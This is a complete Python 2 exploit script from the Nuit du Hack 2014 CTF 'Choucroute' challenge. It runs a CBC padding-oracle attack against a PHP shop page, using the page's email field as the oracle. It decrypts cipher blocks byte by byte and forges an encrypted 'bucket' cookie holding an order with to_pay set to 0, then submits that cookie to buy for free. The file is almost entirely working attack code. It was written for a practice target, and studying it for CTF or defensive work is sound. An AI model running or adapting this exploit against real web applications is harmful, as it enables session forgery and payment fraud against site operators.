#!/usr/bin/env python2

'''
Nuit du Hack 2014
Public CTF
Choucroute challenge

Exploit by Rogdham
2014.06.29
See http://r.rogdham.net/23
Licence: CC0

    This program is free software. It comes without any warranty, to the extent
    permitted by applicable law. You can redistribute it and/or modify it under
    the terms of the CC0 1.0 Universal Licence (French).
    See CC0 https://creativecommons.org/publicdomain/zero/1.0/deed.fr for more
    details.

Requires the Requests library (http://docs.python-requests.org/en/latest/).
Tested with Python 2.7 and Requests 2.3.0.

If you want to run the challenge locally, try `php -S localhost:8000` and
change the last line of this file to reflect the change in the URL.
'''

import sys
import requests
import urllib
from hashlib import md5


# xor two strings together, up to the length of the smaller one
xor = lambda x, y: ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(x, y))


class Exploit(object):

    def __init__(self, index_url):
        self.index_url = index_url
        self.nb_requests = 0

    def debug(self, m):
        sys.stderr.write('%s' % m)
        sys.stderr.flush()

    def oracle_check(self, iv, block):
        for pad in ('\x00', '\xff'):
            bucket = iv + pad * (16 - len(iv)) + block
            if not self._oracle_check(bucket):
                return False
            if len(iv) == 16:
                break  # padding is irrelevant, avoid the double check
        return True

    def _oracle_check(self, bucket):
        r = requests.get(
            '%s?go' % self.index_url,
            cookies={'bucket': urllib.quote(bucket.encode('base64'))}
        )
        self.nb_requests += 1
        # grab email
        # (no need for regex/BeautifulSoup/etc here: see http://langsec.org/)
        email = r.text
        email = email[email.index('ut type="text" name="email" value="') + 35:]
        email = email[:email.index('"')]
        return email != 'e-mail'  # check against default email value

    def decrypt(self, block):
        decrypted = ''
        # first 15 chars: search for \x00 (2 padding tests)
        while len(decrypted) < 15:
            self.debug('.')
            for c in xrange(256):
                iv = xor(decrypted, '0' * 16) + chr(c)
                if self.oracle_check(iv, block):
                    decrypted += chr(c)
                    break
            else:
                raise ValueError('Woops')
        # last char: search for } (padding irrelevant)
        self.debug('.')
        for c in xrange(256):
            iv = xor(decrypted, '{' + ' ' * 14) + chr(c)
            if self.oracle_check(iv, block):
                decrypted += chr(c ^ ord('}'))
                break
        else:
            raise ValueError('Woops')
        return decrypted

    def run(self):
        target = '{"auth":"Rogdham","quantity":"1","to_pay":0,' \
                 '"security_check":"%s"}' % md5('1|0').hexdigest()
        assert len(target) % 16 == 0  # making our life easier
        # split into 16-bytes blocks
        blocks = []
        i = 0
        while i < len(target):
            blocks.append(target[i:i+16])
            i += 16
        blocks.reverse()
        # reverse the steps of the CBC mode
        last = 'r.rogdham.net/23'  # last block does not matter
        bucket = last
        for block, n in zip(blocks, xrange(len(blocks))):
            self.debug('Block %d/%d' % (n + 1, len(blocks)))
            decrypted = self.decrypt(last)
            self.debug('\n')
            last = xor(block, decrypted)
            bucket = last + bucket
        self.debug('Done with %d requests\n' % self.nb_requests)
        print 'Bucket value: %s' % urllib.quote(bucket.encode('base64'))
        # now that we have the bucket, let's use it!
        r = requests.post(
            self.index_url,
            data={'buy': ''},
            cookies={'bucket': urllib.quote(bucket.encode('base64'))}
        )
        print 'Buy response:'
        print r.text


if __name__ == '__main__':
    Exploit('http://choucroute.wargame.ndh/index.php').run()
